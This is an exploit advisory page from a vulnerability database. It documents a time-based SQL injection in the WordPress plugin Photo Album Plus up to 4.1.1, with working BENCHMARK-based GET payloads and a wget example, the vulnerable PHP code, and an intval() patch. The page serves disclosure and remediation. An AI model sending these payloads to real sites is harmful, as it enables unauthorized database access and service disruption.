Lucene search
+L

Wordpress Plugin Photo Album Plus <= 4.1.1 - SQL Injection Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 27 Views

Wordpress Plugin Photo Album Plus <= 4.1.1 SQL Injection Vulnerabilit

Code

                                                # Exploit Title: WP Photo Album Plus &#60;= 4.1.1 SQL Injection Vulnerability
# Date: 2011-10-14
# Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Plugin Page: http://wordpress.org/extend/plugins/wp-photo-album-plus/
# Software Link: http://downloads.wordpress.org/plugin/wp-photo-album-plus.zip
# Version: 4.1.1 (tested)

---------------
PoC (GET data)
---------------
http://127.0.0.1/wordpress/?page_id=7&wppa-album=1 AND 1=IF(2&#62;1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1
wppa-album=1 AND 1=IF(2&#62;1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1 

e.g.

wget &#34;http://127.0.0.1/wordpress/?page_id=7&wppa-album=1 AND 1=IF(2&#62;1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1&#34;

---------------
Vulnerable code
---------------
Line 76 of wppa-functions.php:
if ( $this_occur ) $alb = wppa_get_get(&#39;album&#39;);
        if ( ! $alb && is_numeric($wppa[&#39;start_album&#39;]) ) $alb = $wppa[&#39;start_album&#39;];

        $separate = wppa_is_separate($alb);

$slide = ( wppa_get_album_title_linktype($alb) == &#39;slide&#39; ) ? &#39;&amp;wppa-slide&#39; : &#39;&#39;;


Line 3170 of wppa-functions.php:
function wppa_get_get($index, $default = false) {
#xdebug_start_trace(&#39;/var/www/xdebug.log&#39;);
        if (isset($_GET[&#39;wppa-&#39;.$index])) {             // New syntax first
                return $_GET[&#39;wppa-&#39;.$index];
        }
        if (isset($_GET[$index])) {                             // Old syntax
                return $_GET[$index];
        }
        return $default;
}

Line 3362 of wppa-functions.php:
function wppa_get_album_title_linktype($alb) {
global $wpdb;
        if ( $alb ) $result = $wpdb-&#62;get_var(&#34;SELECT cover_linktype FROM &#34;.WPPA_ALBUMS.&#34; WHERE id = &#34;.$alb.&#34; LIMIT 1&#34;);
        else $result = &#39;&#39;;
echo $result;
        return $result;
}

---------------
Patch
---------------
*** ./wppa-functions.php	2011-10-03 09:37:48.000000000 -0400
--- ./wppa-functions.php.new	2011-10-15 16:02:27.996945496 -0400
***************
*** 3361,3367 ****
  
  function wppa_get_album_title_linktype($alb) {
  global $wpdb;
! 
  	if ( $alb ) $result = $wpdb-&#62;get_var(&#34;SELECT cover_linktype FROM &#34;.WPPA_ALBUMS.&#34; WHERE id = &#34;.$alb.&#34; LIMIT 1&#34;);
  	else $result = &#39;&#39;;
  //echo $result;
--- 3361,3367 ----
  
  function wppa_get_album_title_linktype($alb) {
  global $wpdb;
! 	$alb=intval($alb);
  	if ( $alb ) $result = $wpdb-&#62;get_var(&#34;SELECT cover_linktype FROM &#34;.WPPA_ALBUMS.&#34; WHERE id = &#34;.$alb.&#34; LIMIT 1&#34;);
  	else $result = &#39;&#39;;
  //echo $result;
***************
*** 3384,3387 ****
  global $wppa;
  
  	if ( $wppa[&#39;any&#39;] ) echo $wppa[&#39;searchresults&#39;];
! }
\ No newline at end of file
--- 3384,3387 ----
  global $wppa;
  
  	if ( $wppa[&#39;any&#39;] ) echo $wppa[&#39;searchresults&#39;];
! }


                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
27